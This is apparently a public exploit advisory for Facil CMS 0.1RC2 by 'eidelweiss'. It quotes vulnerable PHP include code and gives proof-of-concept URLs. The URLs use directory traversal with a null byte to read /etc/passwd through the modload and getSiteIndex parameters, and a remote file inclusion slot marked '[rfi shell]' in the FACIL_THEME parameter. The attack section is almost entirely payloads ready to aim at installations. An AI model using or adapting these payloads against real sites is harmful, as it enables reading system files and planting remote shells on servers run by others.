Facil CMS 0.1RC2 Local File Inclusion / Remote File Inclusion

`########################################################  
Facil-CMS (LFI/RFI) Vulnerability  
########################################################  
[+]Title : Facil-CMS Multiple Vulnerability  
[+]Version: 0.1RC2   
[+]Download: http://sourceforge.net/projects/facil-cms/files/  
[+]Author: eidelweiss  
[+]Contact: eidelweiss[at]cyberservices[dot]com   
  
[!]Thank`s To: all friends  
  
########################################################  
  
-=[ Vuln C0de ]=-  
***********************  
[-]facil-cms/index.php  
  
require_once('config.inc.php');  
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');  
  
$config = new facilConfig();  
$utils = new facilUtils();  
  
if($utils->is_module($config->getSiteIndex()))  
  
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');  
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');  
  
***********************  
[-]facil-cms/modules.php  
  
require_once('config.inc.php');  
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');  
  
if($_POST['modload'] && !eregi("/", $_POST['modload']))  
{  
$_MODLOAD = trim($_POST['modload']);  
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))  
{  
$FILELOAD = trim($_POST['fileload']);  
  
$_MODLOAD = false;  
$FILELOAD = false;  
  
if($_POST['admload'] && !eregi("/", $_POST['admload']))  
{  
$_ADMLOAD = trim($_POST['admload']);  
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))  
  
  
$_ADMLOAD = false;  
$FILELOAD = false;  
  
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');  
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');  
  
*******************  
  
[-]facil-cms/includes/facil-settings.php  
  
if(!isset($_SESSION['FACIL_LANGUAGE']))  
{  
$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();  
}  
  
require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');  
require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');  
  
*******************  
  
-=[ Proof Of Concept ]=-  
  
http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00  
  
http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00  
  
http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]  
  
########################################################  
`